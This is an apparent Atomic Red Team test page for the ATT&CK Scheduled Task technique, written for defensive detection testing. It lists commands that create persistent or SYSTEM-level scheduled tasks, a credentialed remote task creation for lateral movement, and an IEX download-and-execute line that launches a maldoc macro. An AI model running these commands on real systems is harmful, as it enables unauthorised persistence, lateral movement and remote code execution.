Skip to content

Latest commit

 

History

History
239 lines (131 loc) · 7.03 KB

T1053.005.md

File metadata and controls

239 lines (131 loc) · 7.03 KB
Raw

T1053.005 - Scheduled Task

Description from ATT&CK

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated at utility could also be abused by adversaries (ex: At (Windows)), though at.exe can not access tasks created with schtasks or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).

Atomic Tests


Atomic Test #1 - Scheduled Task Startup Script

Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

Cleanup Commands:

schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1
schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1


Atomic Test #2 - Scheduled task Local

Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
task_command What you want to execute String C:\windows\system32\cmd.exe
time What time 24 Hour String 72600

Attack Commands: Run with command_prompt!

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

Cleanup Commands:

SCHTASKS /Delete /TN spawn /F >nul 2>&1


Atomic Test #3 - Scheduled task Remote

Create a task on a remote system.

Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
task_command What you want to execute String C:\windows\system32\cmd.exe
time What time 24 Hour String 72600
target Target String localhost
user_name Username to authenticate with, format: DOMAIN\User String DOMAIN\user
password Password to authenticate with String At0micStrong

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

Cleanup Commands:

SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1


Atomic Test #4 - Powershell Cmdlet Scheduled Task

Create an atomic scheduled task that leverages native powershell cmdlets.

Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.

Supported Platforms: Windows

Attack Commands: Run with powershell!

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

Cleanup Commands:

Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1


Atomic Test #5 - Task Scheduler via VBA

This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
ms_product Maldoc application Word String Word

Attack Commands: Run with powershell!

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed
Check Prereq Commands:
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
Get Prereq Commands:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"


Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task

Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

Cleanup Commands:

Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1